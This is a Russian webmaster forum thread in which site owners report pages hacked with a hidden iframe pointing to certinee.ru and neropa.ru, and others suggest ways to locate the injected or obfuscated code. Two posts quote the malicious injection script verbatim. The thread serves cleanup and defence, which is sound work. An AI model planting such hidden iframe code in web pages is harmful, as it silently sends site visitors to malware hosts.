Вирус от certinee.ru

12 3
AD
На сайте с 05.05.2007
Offline
240
2461

Шустрые ребята, позавчера зарег. домен, а сегодня уже кучу сайтов поломали. Написал в РЕГ.ру навсякий и в его хостинг, думаю реакции будет 0. Вставляют в ифрейм код. Кто знает как с этим бороться или хотя бы где искать код? Хостинг мой молчит пока. Примеры поломанных сайтов тут

Андрей
На сайте с 30.09.2009
Offline
482
#1

Сайты на каком движке?

EuroHoster.org ( https://eurohoster.org/ru/ ) - территория быстрых серверов. Выделенные серверы, VPS, SSL, домены и VPN.
DeL Esprit
На сайте с 27.01.2010
Offline
223
#2
WapGraf:
Сайты на каком движке?

поcмотрел пару сайтов - движки разные (думал ДЛЕ будут все:))

на сайтах вставка ай-фрейма, типа

<script>if (navigator.userAgent.search(/Opera|Firefox|MSIE/) > -1) {document.write('<iframe src="http://dom1380381304.certinee.ru/temp/support/1bmjxx4nn?cmpid=586670" style="position:absolute;top:-5px;height:1px;width:28px;"></iframe>');}</script></head>

не смотрел - может хостинг одинаковый на них - и просто его сломали.

Тестирую облачный майнинг - узнаем развод или нет. - окупаемость 3 месяца? мелкие суммы (https://goo.gl/aPWmoj) | майнинг Monero, минимум $830 (https://goo.gl/3XivbP) Биржи (ввод/вывод) - на Приват (https://goo.gl/CGZTnD), на Payeer, Capitalist, Advcash, Qiwi... (https://goo.gl/eejAgs)
Андрей
На сайте с 30.09.2009
Offline
482
#3

ТС, лучше информацию конкретную предоставьте. Думаете всем охота гуглить и собирать информацию? Вам же нужно.

AD
На сайте с 05.05.2007
Offline
240
#4

смысл показывать свой пока нет, просто залил из бекапа сохраненую версию, а ломаный жду когда на хостинге посмотрят, покажу по-позже. Сайт не СМС а самый что есть самописный и на дедике он единственный. Посмотрел с этим трояном - полно сайтов ломаных.

Андрей
На сайте с 30.09.2009
Offline
482
#5

Ну здесь вариантов два:

1. уязвимость скрипта

2. троян на ПК

gregzem
На сайте с 22.11.2004
Offline
134
#6

Если сайт самописный, в первую очередь его рекомендуется прогнать через Acunetix Web Vulnerability Scanner или XSpider. Скорее всего дыра.

Антивирус для ISPmanager (https://revisium.com/ru/products/antivirus_for_ispmanager/) | Антивирус для Plesk (https://plesk.revisium.com) | Профессиональное лечение и защита сайтов (https://revisium.com/)
djinn11
На сайте с 16.05.2010
Offline
52
#7

Уже несколько дней на одном из моих сайтов то появляется, то исчезает вот такое:

<script>if (navigator.userAgent.search(/Opera|MSIE/) > -1) {document.write('<iframe src="http://dom1380623411' + '.' + 'neropa.ru/temp/support/agnmhmt3al?cmpid=639088" style="position:absolute;top:-5px;height:1px;width:28px;"></iframe>');}</script></head>

Перерыл все файлы сайта, смотрел и в базе данных, и ниодного совпадения нету.... где ж его еще искать?

О вирусе сообщает мне панель вебмастера гугля или яндекса...

Тут еще вот что, захожу на страницу про которую сообщает яндекс, смотрю исходный код, и перед </head> вижу вредоносный скрипт, а потом обновляю страницу и его уже нету...

Может у кого то такое было или кто знает как решить...?

SIQWELL - Сервера, VDS, Хостинг во Франции, Люксембурге. Администрирование и IT обслуживание (https://siqwell.pw/aff.php?aff=003) Лучшая партнерка для download трафика! (http://loadpays.com/s.php?f=11008)
gregzem
На сайте с 22.11.2004
Offline
134
#8

Либо у вас обфусцированный код генерирует эту вставку, либо на уровне сервера какой-то инжект вставляет код до </head>.

Создайте

test1267345345.php с кодом

<?php phpinfo(); ?>

Если вставка тоже будет, значит на уровне сервера взлом. Если не будет, вероятно, обфусцированный код в движке.

djinn11
На сайте с 16.05.2010
Offline
52
#9
gregzem:
Либо у вас обфусцированный код генерирует эту вставку, либо на уровне сервера какой-то инжект вставляет код до </head>.

Создайте
test1267345345.php с кодом

<?php phpinfo(); ?>

Если вставка тоже будет, значит на уровне сервера взлом. Если не будет, вероятно, обфусцированный код в движке.

Создал, запустил, несколько раз обновлял, ничего нету...

Видимо как вы и сказали - обфусцированный код в движке... но как мне его найти..?

Менять все файлы на оригинальные не вариант, настройки пропадут, плюс я так и не узнаю где была эта бяка...

gregzem
На сайте с 22.11.2004
Offline
134
#10

Все способы поиска обфусцированного кода в движке достаточно трудоемки. Нужно ковырять код.

Для начала просканируйте AI-BOLIT'ом http://revisium.com/ai/, может сходу найдет что-то (оранжевые файлы тоже нужно просмотреть). Дальше есть вариант сравнения вашего движка с оригинальным дистрибутивном в каком-нибудь Araxis Merge Tool или Beyond Compare.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий